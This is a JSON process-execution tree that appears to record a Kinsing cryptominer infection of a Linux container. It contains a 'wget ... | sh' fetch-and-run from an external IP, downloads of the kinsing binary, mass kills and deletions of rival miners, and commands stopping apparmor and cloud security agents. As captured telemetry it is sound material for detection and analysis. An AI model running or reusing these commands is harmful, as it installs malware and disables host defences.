for parent 18225 { "process_name": false, "pid": 18225, "command_line_args": false, "child_processes": [ { "process_name": "/bin/bash", "pid": 18269, "command_line_args": "/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 217.12.209.234/d.sh| sh;tail -f /dev/null", "child_processes": [ { "process_name": "/tmp/kdevtmpfsi", "pid": 22878, "command_line_args": "/tmp/kdevtmpfsi" }, { "process_name": "/usr/bin/tail", "pid": 22497, "command_line_args": "tail -f /dev/null" }, { "process_name": "/usr/bin/wget", "pid": 21060, "command_line_args": "wget -q -O -" }, { "process_name": "/bin/sh", "pid": 21061, "command_line_args": "sh", "child_processes": [ { "process_name": "/usr/bin/crontab", "pid": 22471, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22488, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22448, "command_line_args": "sed /logo0/d" }, { "process_name": "/usr/bin/crontab", "pid": 22462, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22475, "command_line_args": "sed /pastebin/d" }, { "process_name": "/usr/bin/crontab", "pid": 22447, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22455, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22452, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22474, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22450, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22461, "command_line_args": "crontab -" }, { "process_name": "/bin/sed", "pid": 22489, "command_line_args": "sed /ash/d" }, { "process_name": "/bin/sed", "pid": 22457, "command_line_args": "sed /jpg/d" }, { "process_name": "/bin/sed", "pid": 22451, "command_line_args": "sed /logo/d" }, { "process_name": "/bin/sed", "pid": 22463, "command_line_args": "sed /tmp/d" }, { "process_name": "/usr/bin/crontab", "pid": 22484, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22449, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22467, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22464, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22476, "command_line_args": "crontab -" }, { "process_name": "/bin/sed", "pid": 22483, "command_line_args": "sed /lsd.systemten.org/d" }, { "process_name": "/bin/sed", "pid": 22472, "command_line_args": "sed /3.215.110.66.one/d" }, { "process_name": "/usr/bin/crontab", "pid": 22485, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22478, "command_line_args": "sed /onion/d" }, { "process_name": "/usr/bin/crontab", "pid": 22446, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22487, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22490, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22441, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22442, "command_line_args": "sed /logo4/d" }, { "process_name": "/usr/bin/crontab", "pid": 22479, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22458, "command_line_args": "crontab -" }, { "process_name": "/bin/sed", "pid": 22495, "command_line_args": "sed /185.181.10.234/d" }, { "process_name": "/usr/bin/crontab", "pid": 22494, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22477, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22491, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22492, "command_line_args": "sed /mr.sh/d" }, { "process_name": "/usr/bin/crontab", "pid": 22468, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22466, "command_line_args": "sed /zmreplchkr/d" }, { "process_name": "/usr/bin/crontab", "pid": 22453, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22445, "command_line_args": "sed /logo9/d" }, { "process_name": "/usr/bin/crontab", "pid": 22456, "command_line_args": "crontab -l" }, { "process_name": "/bin/sed", "pid": 22454, "command_line_args": "sed /tor2web/d" }, { "process_name": "/usr/bin/crontab", "pid": 22429, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22444, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22459, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22493, "command_line_args": "crontab -" }, { "process_name": "/bin/sed", "pid": 22460, "command_line_args": "sed /png/d" }, { "process_name": "/bin/sed", "pid": 22486, "command_line_args": "sed /shuf/d" }, { "process_name": "/usr/bin/crontab", "pid": 22473, "command_line_args": "crontab -" }, { "process_name": "/bin/sed", "pid": 22469, "command_line_args": "sed /aliyun.one/d" }, { "process_name": "/usr/bin/crontab", "pid": 22470, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22482, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22496, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22465, "command_line_args": "crontab -l" }, { "process_name": "/bin/grep", "pid": 22431, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 22430, "command_line_args": "grep -e 195.3.146.118" }, { "process_name": "/bin/chmod", "pid": 22373, "command_line_args": "chmod +x /var/tmp/kinsing" }, { "process_name": "/bin/sed", "pid": 22438, "command_line_args": "sed /update.sh/d" }, { "process_name": "/usr/bin/crontab", "pid": 22437, "command_line_args": "crontab -l" }, { "process_name": "/usr/bin/crontab", "pid": 22433, "command_line_args": "crontab -" }, { "process_name": "/usr/bin/crontab", "pid": 22439, "command_line_args": "crontab -" }, { "process_name": "/var/tmp/kinsing", "pid": 22378, "command_line_args": "/var/tmp/kinsing", "child_processes": [ { "process_name": "/usr/bin/getconf", "pid": 22383, "command_line_args": "/usr/bin/getconf CLK_TCK" }, { "process_name": "/var/tmp/kinsing", "pid": 22424, "command_line_args": "/var/tmp/kinsing", "child_processes": [ { "process_name": "/bin/sh", "pid": 22875, "command_line_args": "sh -c chmod +x /tmp/kdevtmpfsi", "child_processes": [ { "process_name": "/bin/chmod", "pid": 22876, "command_line_args": "chmod +x /tmp/kdevtmpfsi" } ] }, { "process_name": "/bin/sh", "pid": 22877, "command_line_args": "sh -c /tmp/kdevtmpfsi &" }, { "process_name": "/bin/sh", "pid": 22873, "command_line_args": "sh -c pkill -f kdevtmpfsi", "child_processes": [ { "process_name": "/usr/bin/pkill", "pid": 22874, "command_line_args": "pkill -f kdevtmpfsi" } ] }, { "process_name": "/usr/bin/getconf", "pid": 22435, "command_line_args": "/usr/bin/getconf CLK_TCK" } ] } ] }, { "process_name": "/usr/bin/crontab", "pid": 22443, "command_line_args": "crontab -" }, { "process_name": "/bin/rm", "pid": 22122, "command_line_args": "rm -rf /tmp/.tmpnewzz" }, { "process_name": "/usr/bin/pkill", "pid": 22081, "command_line_args": "pkill -f crond64" }, { "process_name": "/usr/bin/awk", "pid": 22271, "command_line_args": "awk {print $1}" }, { "process_name": "/usr/bin/pkill", "pid": 22047, "command_line_args": "pkill -f mstxmr" }, { "process_name": "/bin/grep", "pid": 22313, "command_line_args": "grep auto" }, { "process_name": "/usr/bin/pkill", "pid": 22006, "command_line_args": "pkill -f cryptonight" }, { "process_name": "/usr/bin/awk", "pid": 22266, "command_line_args": "awk {print $1}" }, { "process_name": "/usr/bin/pkill", "pid": 22074, "command_line_args": "pkill -f zer0day.ru" }, { "process_name": "/bin/rm", "pid": 22141, "command_line_args": "rm -rf /tmp/lilpip" }, { "process_name": "/usr/bin/awk", "pid": 22283, "command_line_args": "awk {print $3}" }, { "process_name": "/usr/bin/pkill", "pid": 22058, "command_line_args": "pkill -f systemctI" }, { "process_name": "/bin/rm", "pid": 22226, "command_line_args": "rm -rf /var/tmp/.java" }, { "process_name": "/bin/chmod", "pid": 22233, "command_line_args": "chmod +700 /tmp/lok" }, { "process_name": "/bin/rm", "pid": 22167, "command_line_args": "rm -rf /tmp/kerberods" }, { "process_name": "/usr/bin/pkill", "pid": 22016, "command_line_args": "pkill -f irqbalance" }, { "process_name": "/usr/bin/pkill", "pid": 22010, "command_line_args": "pkill -f JnKihGjn" }, { "process_name": "/usr/bin/pkill", "pid": 22077, "command_line_args": "pkill -f systemctI" }, { "process_name": "/usr/bin/xargs", "pid": 22250, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22079, "command_line_args": "pkill -f init10.cfg" }, { "process_name": "/usr/bin/pkill", "pid": 22051, "command_line_args": "pkill -f disk_genius" }, { "process_name": "/usr/bin/pkill", "pid": 22053, "command_line_args": "pkill -f polkitd" }, { "process_name": "/bin/grep", "pid": 22304, "command_line_args": "grep registry" }, { "process_name": "/usr/bin/pkill", "pid": 22013, "command_line_args": "pkill -f irqbnc1" }, { "process_name": "/bin/rm", "pid": 22115, "command_line_args": "rm -rf /tmp/osw.hb" }, { "process_name": "/bin/rm", "pid": 22345, "command_line_args": "rm -rf /usr/local/aegis" }, { "process_name": "/bin/rm", "pid": 22090, "command_line_args": "rm -rf /tmp/log_rot" }, { "process_name": "/bin/rm", "pid": 22195, "command_line_args": "rm /opt/atlassian/confluence/bin/1" }, { "process_name": "/bin/rm", "pid": 22126, "command_line_args": "rm -rf /tmp/devtool" }, { "process_name": "/bin/rm", "pid": 22164, "command_line_args": "rm -rf /tmp/khugepageds" }, { "process_name": "/bin/grep", "pid": 22318, "command_line_args": "grep mine" }, { "process_name": "/bin/rm", "pid": 22166, "command_line_args": "rm -rf /tmp/.kerberods" }, { "process_name": "/bin/chmod", "pid": 22351, "command_line_args": "chmod +x /var/tmp/kinsing" }, { "process_name": "/usr/bin/xargs", "pid": 22294, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22050, "command_line_args": "pkill -f deamon" }, { "process_name": "/bin/rm", "pid": 22095, "command_line_args": "rm -rf /tmp/pprt" }, { "process_name": "/usr/bin/xargs", "pid": 22263, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22143, "command_line_args": "rm -rf /tmp/am8jmBP" }, { "process_name": "/bin/rm", "pid": 22223, "command_line_args": "rm -rf /var/tmp/play.sh" }, { "process_name": "/bin/rm", "pid": 22229, "command_line_args": "rm -r /var/tmp/lib" }, { "process_name": "/bin/rm", "pid": 22210, "command_line_args": "rm -rf /var/tmp/wc.conf" }, { "process_name": "/usr/bin/chattr", "pid": 22232, "command_line_args": "chattr -iau /tmp/lok" }, { "process_name": "/usr/bin/pkill", "pid": 22083, "command_line_args": "pkill -f vmlinuz" }, { "process_name": "/usr/bin/pkill", "pid": 22038, "command_line_args": "pkill -f pro.sh" }, { "process_name": "/usr/bin/xargs", "pid": 22307, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22082, "command_line_args": "pkill -f sustse" }, { "process_name": "/bin/rm", "pid": 22184, "command_line_args": "rm -rf /etc/rc.d/init.d/watchdogs" }, { "process_name": "/usr/bin/pkill", "pid": 22005, "command_line_args": "pkill -f apaceha" }, { "process_name": "/usr/bin/pkill", "pid": 22029, "command_line_args": "pkill -f ysaydh" }, { "process_name": "/usr/bin/pkill", "pid": 22069, "command_line_args": "pkill -f nginxk" }, { "process_name": "/bin/grep", "pid": 22282, "command_line_args": "grep pocosow" }, { "process_name": "/usr/bin/pkill", "pid": 22063, "command_line_args": "pkill -f xmrig-cpu" }, { "process_name": "/bin/rm", "pid": 22129, "command_line_args": "rm -rf /tmp/.rod" }, { "process_name": "/bin/rm", "pid": 22220, "command_line_args": "rm -rf /var/tmp/moneroocean/" }, { "process_name": "/usr/bin/pkill", "pid": 22040, "command_line_args": "pkill -f acpid" }, { "process_name": "/bin/rm", "pid": 22234, "command_line_args": "rm -rf /tmp/lok" }, { "process_name": "/bin/rm", "pid": 22120, "command_line_args": "rm -rf /tmp/.tmpc" }, { "process_name": "/usr/bin/awk", "pid": 22297, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22191, "command_line_args": "rm -rf /tmp/nullcrew" }, { "process_name": "/bin/rm", "pid": 22152, "command_line_args": "rm -rf /tmp/.mynews1234" }, { "process_name": "/usr/bin/pkill", "pid": 22015, "command_line_args": "pkill -f conns" }, { "process_name": "/usr/bin/pkill", "pid": 22065, "command_line_args": "pkill -f sysguard" }, { "process_name": "/usr/bin/wget", "pid": 22350, "command_line_args": "wget -O /var/tmp/kinsing https://bitbucket.org/kimrakfl3" }, { "process_name": "/bin/rm", "pid": 22100, "command_line_args": "rm -rf /tmp/1.so" }, { "process_name": "/bin/rm", "pid": 22162, "command_line_args": "rm -rf /tmp/go.sh" }, { "process_name": "/bin/rm", "pid": 22104, "command_line_args": "rm -rf /tmp/xd.json" }, { "process_name": "/bin/rm", "pid": 22225, "command_line_args": "rm -rf /var/tmp/update.sh" }, { "process_name": "/bin/rm", "pid": 22186, "command_line_args": "rm -f /tmp/kthrotlds" }, { "process_name": "/usr/bin/xargs", "pid": 22268, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22174, "command_line_args": "rm -rf /dev/shm/z2.sh" }, { "process_name": "/bin/rm", "pid": 22156, "command_line_args": "rm -rf /tmp/.pt.tgz.1" }, { "process_name": "/usr/bin/awk", "pid": 22343, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 22289, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22159, "command_line_args": "rm -rf /tmp/j2.conf" }, { "process_name": "/bin/rm", "pid": 22144, "command_line_args": "rm -rf /tmp/tmp.txt" }, { "process_name": "/bin/rm", "pid": 22133, "command_line_args": "rm -rf /tmp/.mer" }, { "process_name": "/bin/rm", "pid": 22112, "command_line_args": "rm -rf /tmp/systemxlv" }, { "process_name": "/bin/rm", "pid": 22101, "command_line_args": "rm -rf /tmp/kworkerds" }, { "process_name": "/usr/bin/pkill", "pid": 22072, "command_line_args": "pkill -f xmr-stak" }, { "process_name": "/usr/bin/xargs", "pid": 22246, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22199, "command_line_args": "rm /opt/atlassian/confluence/bin/3" }, { "process_name": "/usr/bin/xargs", "pid": 22311, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22151, "command_line_args": "rm -rf /tmp/j2.conf" }, { "process_name": "/usr/bin/pkill", "pid": 22025, "command_line_args": "pkill -f askdljlqw" }, { "process_name": "/bin/rm", "pid": 22222, "command_line_args": "rm -rf /var/tmp/devtools" }, { "process_name": "/usr/bin/pkill", "pid": 22037, "command_line_args": "pkill -f kw.sh" }, { "process_name": "/usr/bin/pkill", "pid": 22076, "command_line_args": "pkill -f nullcrew" }, { "process_name": "/bin/rm", "pid": 22212, "command_line_args": "rm -rf /var/tmp/nadezhda.arm" }, { "process_name": "/bin/rm", "pid": 22089, "command_line_args": "rm -rf /tmp/wc.conf" }, { "process_name": "/usr/bin/awk", "pid": 22301, "command_line_args": "awk {print $3}" }, { "process_name": "/usr/bin/xargs", "pid": 22238, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/grep", "pid": 22337, "command_line_args": "grep aegis" }, { "process_name": "/bin/rm", "pid": 22188, "command_line_args": "rm -rf /tmp/.sysbabyuuuuu12" }, { "process_name": "/bin/rm", "pid": 22087, "command_line_args": "rm -rf /usr/bin/exin" }, { "process_name": "/bin/rm", "pid": 22118, "command_line_args": "rm -rf /tmp/.java" }, { "process_name": "/usr/bin/pkill", "pid": 22085, "command_line_args": "pkill -f apachiii" }, { "process_name": "/bin/grep", "pid": 22270, "command_line_args": "grep bash.shell" }, { "process_name": "/bin/rm", "pid": 22123, "command_line_args": "rm -rf /tmp/gates.lod" }, { "process_name": "/usr/bin/pkill", "pid": 22052, "command_line_args": "pkill -f sourplum" }, { "process_name": "/bin/rm", "pid": 22114, "command_line_args": "rm -rf /tmp/.abc" }, { "process_name": "/usr/bin/pkill", "pid": 22023, "command_line_args": "pkill -f NXLAi" }, { "process_name": "/bin/rm", "pid": 22185, "command_line_args": "rm -rf /usr/sbin/watchdogs" }, { "process_name": "/usr/bin/awk", "pid": 22310, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22110, "command_line_args": "rm -rf /tmp/dl" }, { "process_name": "/bin/rm", "pid": 22207, "command_line_args": "rm -rf /var/tmp/kworkerds3" }, { "process_name": "/bin/rm", "pid": 22187, "command_line_args": "rm -f /etc/rc.d/init.d/kthrotlds" }, { "process_name": "/bin/grep", "pid": 22256, "command_line_args": "grep mine" }, { "process_name": "/bin/grep", "pid": 22248, "command_line_args": "grep auto" }, { "process_name": "/usr/bin/pkill", "pid": 22033, "command_line_args": "pkill -f Duck.sh" }, { "process_name": "/bin/rm", "pid": 22132, "command_line_args": "rm -rf /tmp/.rod.tgz.2" }, { "process_name": "/usr/bin/awk", "pid": 22241, "command_line_args": "awk {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 22327, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22203, "command_line_args": "rm -rf /var/tmp/2.sh" }, { "process_name": "/bin/rm", "pid": 22165, "command_line_args": "rm -rf /tmp/.censusqqqqqqqqq" }, { "process_name": "/usr/bin/pkill", "pid": 22019, "command_line_args": "pkill -f mgwsl" }, { "process_name": "/bin/ps", "pid": 22340, "command_line_args": "ps aux" }, { "process_name": "/bin/rm", "pid": 22221, "command_line_args": "rm -rf /var/tmp/devtool" }, { "process_name": "/usr/bin/pkill", "pid": 22011, "command_line_args": "pkill -f irqba2anc1" }, { "process_name": "/usr/bin/pkill", "pid": 22075, "command_line_args": "pkill -f dbus-daemon--system" }, { "process_name": "/bin/rm", "pid": 22139, "command_line_args": "rm -rf /tmp/84Onmce" }, { "process_name": "/usr/bin/awk", "pid": 22319, "command_line_args": "awk {print $3}" }, { "process_name": "/usr/bin/pkill", "pid": 22080, "command_line_args": "pkill -f /wl.conf" }, { "process_name": "/usr/bin/awk", "pid": 22237, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/rm", "pid": 22142, "command_line_args": "rm -rf /tmp/3lmigMo" }, { "process_name": "/usr/bin/pkill", "pid": 22073, "command_line_args": "pkill -f suppoie" }, { "process_name": "/bin/grep", "pid": 22341, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pkill", "pid": 22061, "command_line_args": "pkill -f sustes" }, { "process_name": "/bin/rm", "pid": 22117, "command_line_args": "rm -rf /tmp/.tmpnewzz" }, { "process_name": "/usr/bin/pkill", "pid": 22046, "command_line_args": "pkill -f gddr" }, { "process_name": "/bin/rm", "pid": 22127, "command_line_args": "rm -rf /tmp/devtools" }, { "process_name": "/bin/rm", "pid": 22102, "command_line_args": "rm -rf /tmp/kworkerds3" }, { "process_name": "/bin/grep", "pid": 22291, "command_line_args": "grep buster-slim" }, { "process_name": "/usr/bin/awk", "pid": 22323, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22180, "command_line_args": "rm -f /etc/ld.so.preload" }, { "process_name": "/usr/bin/pkill", "pid": 22054, "command_line_args": "pkill -f nanoWatch" }, { "process_name": "/bin/rm", "pid": 22108, "command_line_args": "rm -rf /tmp/jmxx" }, { "process_name": "/bin/rm", "pid": 22121, "command_line_args": "rm -rf /tmp/.tmpleve" }, { "process_name": "/bin/rm", "pid": 22103, "command_line_args": "rm -rf /tmp/kworkerdssx" }, { "process_name": "/bin/rm", "pid": 22228, "command_line_args": "rm -rf /var/tmp/conf.n" }, { "process_name": "/bin/rm", "pid": 22125, "command_line_args": "rm -rf /tmp/update.sh" }, { "process_name": "/bin/rm", "pid": 22124, "command_line_args": "rm -rf /tmp/conf.n" }, { "process_name": "/bin/rm", "pid": 22173, "command_line_args": "rm -rf /dev/shm/z3.sh" }, { "process_name": "/bin/grep", "pid": 22286, "command_line_args": "grep gakeaws" }, { "process_name": "/bin/rm", "pid": 22150, "command_line_args": "rm -rf /tmp/java" }, { "process_name": "/usr/bin/pkill", "pid": 22045, "command_line_args": "pkill -f i586" }, { "process_name": "/bin/rm", "pid": 22155, "command_line_args": "rm -rf /tmp/.pt.tgz" }, { "process_name": "/bin/rm", "pid": 22205, "command_line_args": "rm -rf /var/tmp/xmrig" }, { "process_name": "/usr/bin/awk", "pid": 22279, "command_line_args": "awk {print $1}" }, { "process_name": "/usr/bin/pkill", "pid": 22028, "command_line_args": "pkill -f Guard.sh" }, { "process_name": "/bin/rm", "pid": 22202, "command_line_args": "rm -rf /var/tmp/f41" }, { "process_name": "/usr/bin/awk", "pid": 22275, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/rm", "pid": 22113, "command_line_args": "rm -rf /tmp/systemctI" }, { "process_name": "/usr/sbin/service", "pid": 22329, "command_line_args": "service apparmor stop", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 22330, "command_line_args": "basename /usr/sbin/service" }, { "process_name": "/usr/bin/basename", "pid": 22331, "command_line_args": "basename /usr/sbin/service" } ] }, { "process_name": "/bin/rm", "pid": 22190, "command_line_args": "rm -rf /tmp/miner.sh" }, { "process_name": "/bin/grep", "pid": 22309, "command_line_args": "grep xmr" }, { "process_name": "/usr/bin/pkill", "pid": 22008, "command_line_args": "pkill -f mixnerdx" }, { "process_name": "/usr/bin/pkill", "pid": 22067, "command_line_args": "pkill -f sysupdate" }, { "process_name": "/usr/bin/wget", "pid": 22356, "command_line_args": "wget -O /var/tmp/kinsing http://217.12.209.234/kinsing" }, { "process_name": "/bin/rm", "pid": 22211, "command_line_args": "rm -rf /var/tmp/nadezhda." }, { "process_name": "/bin/grep", "pid": 22236, "command_line_args": "grep pocosow" }, { "process_name": "/bin/rm", "pid": 22181, "command_line_args": "rm -f /usr/local/lib/libioset.so" }, { "process_name": "/bin/grep", "pid": 22265, "command_line_args": "grep slowhttp" }, { "process_name": "/bin/rm", "pid": 22091, "command_line_args": "rm -rf /tmp/apachiii" }, { "process_name": "/usr/bin/pkill", "pid": 22030, "command_line_args": "pkill -f bonns" }, { "process_name": "/usr/bin/xargs", "pid": 22302, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22017, "command_line_args": "pkill -f crypto-pool" }, { "process_name": "/bin/rm", "pid": 22169, "command_line_args": "rm -rf /tmp/touch" }, { "process_name": "/usr/bin/pkill", "pid": 22044, "command_line_args": "pkill -f minerd" }, { "process_name": "/bin/rm", "pid": 22096, "command_line_args": "rm -rf /tmp/ppol" }, { "process_name": "/bin/rm", "pid": 22194, "command_line_args": "rm /opt/atlassian/confluence/bin/1" }, { "process_name": "/usr/bin/pkill", "pid": 22031, "command_line_args": "pkill -f donns" }, { "process_name": "/usr/sbin/service", "pid": 22332, "command_line_args": "service aliyun.service stop", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 22333, "command_line_args": "basename /usr/sbin/service" }, { "process_name": "/usr/bin/basename", "pid": 22334, "command_line_args": "basename /usr/sbin/service" } ] }, { "process_name": "/usr/bin/awk", "pid": 22287, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22146, "command_line_args": "rm -rf /tmp/.lib" }, { "process_name": "/usr/bin/pkill", "pid": 22088, "command_line_args": "pkill -f log_rot" }, { "process_name": "/bin/rm", "pid": 22230, "command_line_args": "rm -r /var/tmp/.lib" }, { "process_name": "/bin/grep", "pid": 22300, "command_line_args": "grep azulu" }, { "process_name": "/usr/bin/pkill", "pid": 22060, "command_line_args": "pkill -f cryptonight" }, { "process_name": "/usr/bin/awk", "pid": 22249, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/rm", "pid": 22198, "command_line_args": "rm /opt/atlassian/confluence/bin/3" }, { "process_name": "/bin/rm", "pid": 22200, "command_line_args": "rm /opt/atlassian/confluence/bin/3" }, { "process_name": "/usr/bin/xargs", "pid": 22328, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22134, "command_line_args": "rm -rf /tmp/.mer.tgz" }, { "process_name": "/bin/rm", "pid": 22140, "command_line_args": "rm -rf /tmp/C4iLM4L" }, { "process_name": "/bin/grep", "pid": 22244, "command_line_args": "grep azulu" }, { "process_name": "/usr/bin/pkill", "pid": 22055, "command_line_args": "pkill -f zigw" }, { "process_name": "/bin/rm", "pid": 22171, "command_line_args": "rm -rf /tmp/runtime2.sh" }, { "process_name": "/bin/rm", "pid": 22153, "command_line_args": "rm -rf /tmp/a3e12d" }, { "process_name": "/usr/bin/pkill", "pid": 22041, "command_line_args": "pkill -f icb5o" }, { "process_name": "/usr/bin/xargs", "pid": 22339, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 22284, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22084, "command_line_args": "pkill -f exin" }, { "process_name": "/usr/bin/pkill", "pid": 22062, "command_line_args": "pkill -f xmrig" }, { "process_name": "/usr/bin/xargs", "pid": 22259, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/grep", "pid": 22322, "command_line_args": "grep monero" }, { "process_name": "/usr/bin/awk", "pid": 22292, "command_line_args": "awk {print $3}" }, { "process_name": "/bin/rm", "pid": 22119, "command_line_args": "rm -rf /tmp/.omed" }, { "process_name": "/usr/bin/pkill", "pid": 22066, "command_line_args": "pkill -f networkservice" }, { "process_name": "/bin/rm", "pid": 22138, "command_line_args": "rm -rf /tmp/.hod.tgz.1" }, { "process_name": "/bin/rm", "pid": 22099, "command_line_args": "rm -rf /tmp/.profile" }, { "process_name": "/bin/rm", "pid": 22224, "command_line_args": "rm -rf /var/tmp/systemctI" }, { "process_name": "/bin/rm", "pid": 22145, "command_line_args": "rm -rf /tmp/baby" }, { "process_name": "/bin/rm", "pid": 22218, "command_line_args": "rm -rf /var/tmp/sustse3" }, { "process_name": "/usr/bin/awk", "pid": 22338, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/rm", "pid": 22216, "command_line_args": "rm -rf /var/tmp/nadezhda.x86_64.1" }, { "process_name": "/usr/bin/pkill", "pid": 22009, "command_line_args": "pkill -f performedl" }, { "process_name": "/bin/rm", "pid": 22172, "command_line_args": "rm -rf /tmp/runtime.sh" }, { "process_name": "/bin/rm", "pid": 22106, "command_line_args": "rm -rf /tmp/syslogdb" }, { "process_name": "/bin/rm", "pid": 22157, "command_line_args": "rm -rf /tmp/go" }, { "process_name": "/bin/rm", "pid": 22093, "command_line_args": "rm -rf /tmp/php" }, { "process_name": "/bin/rm", "pid": 22109, "command_line_args": "rm -rf /tmp/2Ne80nA" }, { "process_name": "/bin/rm", "pid": 22092, "command_line_args": "rm -rf /tmp/sustse" }, { "process_name": "/bin/rm", "pid": 22107, "command_line_args": "rm -rf /tmp/65ccEJ7" }, { "process_name": "/usr/bin/pkill", "pid": 22021, "command_line_args": "pkill -f jweri" }, { "process_name": "/bin/ps", "pid": 22335, "command_line_args": "ps aux" }, { "process_name": "/bin/rm", "pid": 22182, "command_line_args": "rm -rf /tmp/watchdogs" }, { "process_name": "/bin/grep", "pid": 22342, "command_line_args": "grep Yun" }, { "process_name": "/bin/grep", "pid": 22252, "command_line_args": "grep xmr" }, { "process_name": "/usr/bin/xargs", "pid": 22242, "command_line_args": "xargs -I % docker" }, { "process_name": "/usr/bin/pkill", "pid": 22032, "command_line_args": "pkill -f kxjd" }, { "process_name": "/bin/rm", "pid": 22227, "command_line_args": "rm -rf /var/tmp/1.sh" }, { "process_name": "/bin/rm", "pid": 22170, "command_line_args": "rm -rf /tmp/.p" }, { "process_name": "/bin/rm", "pid": 22137, "command_line_args": "rm -rf /tmp/.hod.tgz" }, { "process_name": "/bin/rm", "pid": 22201, "command_line_args": "rm /opt/atlassian/confluence/bin/3" }, { "process_name": "/usr/bin/pkill", "pid": 22012, "command_line_args": "pkill -f irqba5xnc1" }, { "process_name": "/bin/rm", "pid": 22168, "command_line_args": "rm -rf /tmp/seasame" }, { "process_name": "/usr/bin/pkill", "pid": 22020, "command_line_args": "pkill -f pythno" }, { "process_name": "/usr/bin/awk", "pid": 22257, "command_line_args": "awk {print $1}" }, { "process_name": "/bin/grep", "pid": 22274, "command_line_args": "grep entrypoint.sh" }, { "process_name": "/bin/rm", "pid": 22213, "command_line_args": "rm -rf /var/tmp/nadezhda.arm.1" }, { "process_name": "/bin/rm", "pid": 22177, "command_line_args": "rm -f /etc/ld.so.preload" }, { "process_name": "/usr/bin/pkill", "pid": 22024, "command_line_args": "pkill -f BI5zj" }, { "process_name": "/usr/bin/pkill", "pid": 22056, "command_line_args": "pkill -f devtool" }, { "process_name": "/bin/rm", "pid": 22098, "command_line_args": "rm -rf /tmp/javax/sshd2" }, { "process_name": "/bin/grep", "pid": 22278, "command_line_args": "grep /var/sbin/bash" }, { "process_name": "/usr/bin/pkill", "pid": 22039, "command_line_args": "pkill -f polkitd" }, { "process_name": "/bin/rm", "pid": 22178, "command_line_args": "rm -f /usr/local/lib/libioset.so" }, { "process_name": "/usr/bin/xargs", "pid": 22324, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22116, "command_line_args": "rm -rf /tmp/.tmpleve" }, { "process_name": "/bin/rm", "pid": 22148, "command_line_args": "rm -rf /tmp/lib.tar.gz" }, { "process_name": "/usr/bin/xargs", "pid": 22280, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/grep", "pid": 22261, "command_line_args": "grep monero" }, { "process_name": "/usr/bin/xargs", "pid": 22272, "command_line_args": "xargs -I % docker" }, { "process_name": "/bin/rm", "pid": 22197, "command_line_args": "rm /opt/atlassian/confluence/bin/1" }, { "process_name": "/bin/rm", "pid": 22149, "command_line_args": "rm -rf /tmp/baby" }, { 